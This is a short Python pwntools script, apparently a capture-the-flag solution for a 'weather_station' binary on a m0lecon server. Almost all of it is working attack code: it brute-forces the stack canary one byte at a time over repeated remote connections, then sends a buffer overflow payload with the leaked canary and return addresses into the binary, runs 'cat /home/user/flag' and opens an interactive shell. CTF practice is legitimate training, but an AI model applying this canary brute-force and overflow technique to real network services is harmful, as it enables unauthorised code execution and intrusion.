59 lines
1.2 KiB
Python
59 lines
1.2 KiB
Python
#!/usr/bin/env python3
|
|
from pwn import *
|
|
import time
|
|
|
|
context.binary = elf = ELF('./weather_station', checksec=False)
|
|
|
|
p = process(elf.path)
|
|
|
|
HOST, PORT = 'offsec.m0lecon.it', 13559
|
|
#HOST, PORT = '127.0.0.1', 5555
|
|
OFFSET_TO_CANARY = 56
|
|
#
|
|
#OFFSET_TO_RIP = OFFSET_TO_CANARY + 8 + 8
|
|
|
|
known = b"\x00"
|
|
|
|
for i in range(7):
|
|
for bval in range(256):
|
|
guess = known + bytes([bval])
|
|
payload = b"A" * OFFSET_TO_CANARY + guess
|
|
|
|
io = remote(HOST, PORT, level='error')
|
|
io.recvuntil(b'location: ')
|
|
io.sendline(b"Safe")
|
|
io.recvuntil(b'query: ')
|
|
io.send(payload)
|
|
|
|
try:
|
|
data = io.recv(timeout=0.2)
|
|
except EOFError:
|
|
data = b""
|
|
io.close()
|
|
if b"Forecast sent!" in data:
|
|
known = guess
|
|
log.success(f"byte {i+1}: {bval:02x}")
|
|
break
|
|
|
|
canary = u64(known)
|
|
|
|
log.info(f"Canary: {canary:#x}")
|
|
|
|
|
|
io = remote(HOST, PORT, level='error')
|
|
io.recvuntil(b'location: ')
|
|
io.sendline(b"Safe")
|
|
io.recvuntil(b'query: ')
|
|
|
|
payload = flat(
|
|
b'A' * OFFSET_TO_CANARY,
|
|
p64(canary),
|
|
b'B' * 8,
|
|
p64(0x000000000040101a),
|
|
p64(0x0000000000401530),
|
|
)
|
|
io.send(payload)
|
|
print(io.recvline())
|
|
print(io.sendline(b'cat /home/user/flag'))
|
|
io.interactive()
|